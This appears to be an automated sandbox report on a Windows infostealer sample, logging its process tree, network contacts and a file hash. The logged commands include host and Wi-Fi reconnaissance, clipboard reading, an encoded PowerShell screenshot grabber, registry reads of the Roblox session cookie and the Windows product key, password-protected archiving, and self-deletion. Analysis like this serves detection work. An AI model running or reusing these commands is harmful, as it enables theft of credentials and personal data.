C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cwqcbj0t\cwqcbj0t.cmdline"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82BD.tmp" "c:\Users\Admin\AppData\Local\Temp\cwqcbj0t\CSC249D26D4459C45A3B0F4373D7B9F8A7.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\A0WiC.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\A0WiC.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8d37fcc40,0x7ff8d37fcc4c,0x7ff8d37fcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1840 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1884,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3124,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4408 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4544,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Nexar.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4608,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4900 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4920 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4912 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4964 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5108,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4920,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5136,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5048,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 blank-g4po3.in udp
US 208.95.112.1:80 ip-api.com tcp
GB 216.58.204.67:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.138.232:443 discord.com tcp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.178.10:443 ogads-pa.googleapis.com tcp
GB 172.217.169.78:443 apis.google.com tcp
GB 142.250.178.10:443 ogads-pa.googleapis.com udp
GB 172.217.16.238:443 play.google.com tcp
GB 216.58.201.110:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
GB 216.58.213.1:443 clients2.googleusercontent.com tcp
GB 142.250.180.4:443 www.google.com udp
GB 216.58.204.74:443 ogads-pa.googleapis.com tcp
US 216.239.34.157:443 tunnel.googlezip.net tcp
GB 142.250.187.202:443 ogads-pa.googleapis.com udp
GB 172.217.16.238:443 play.google.com tcp
GB 172.217.16.238:443 play.google.com udp
GB 104.86.110.129:443 tcp
GB 104.86.110.129:443 tcp
GB 2.22.249.9:443 r.bing.com tcp
GB 2.22.249.9:443 r.bing.com tcp
GB 2.22.249.9:443 r.bing.com tcp
GB 2.22.249.9:443 r.bing.com tcp
GB 2.22.249.9:443 r.bing.com tcp
GB 2.22.249.9:443 r.bing.com tcp
GB 2.22.249.9:443 r.bing.com tcp
GB 2.22.249.9:443 r.bing.com tcp
AU 40.79.167.8:443 browser.pipe.aria.microsoft.com tcp
GB 216.58.213.3:443 beacons.gcp.gvt2.com tcp
GB 216.58.213.3:443 beacons.gcp.gvt2.com tcp
GB 216.58.213.3:443 beacons.gcp.gvt2.com udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI31442\python312.dll

MD5 6f7c42579f6c2b45fe866747127aef09
SHA1 b9487372fe3ed61022e52cc8dbd37e6640e87723
SHA256 07642b6a3d99ce88cff790087ac4e2ba0b2da1100cf1897f36e096427b580ee5
